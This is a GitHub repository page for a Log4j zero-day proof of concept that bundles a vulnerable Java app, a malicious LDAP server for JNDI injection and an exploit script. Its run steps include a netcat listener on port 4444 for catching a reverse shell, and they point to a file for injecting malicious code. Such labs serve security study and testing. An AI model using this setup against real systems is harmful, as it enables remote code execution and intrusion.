Skip to content

rajasoun/log4j-zero-day-exploit

Repository files navigation

Log4J Zero Day Exploit - POC

Vulnerable Log4J App, Malicious LDAP server for JNDI injection attacks and Exploitation Snippet

Run

  1. Open Terminal and Start the Vulnerable Java App, Malicious JNDI Server
./assist.sh poc

  1. Open Another Terminal and Run Exploit Script
./assist.sh exploit
  1. To View the Expolit in POC Container
./assist.sh view
  1. Open Terminal and Run nc -lvn 4444

  2. Open Terminal and Run ./assist.sh exploit

  3. To shell in POC Container

./assist.sh shell

Edit jndi-exploit/src/main/java/com/rajasoun/jndi/ExportObject.java for Malicious Code Injection

About

Log4j Zero-Day Exploit

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published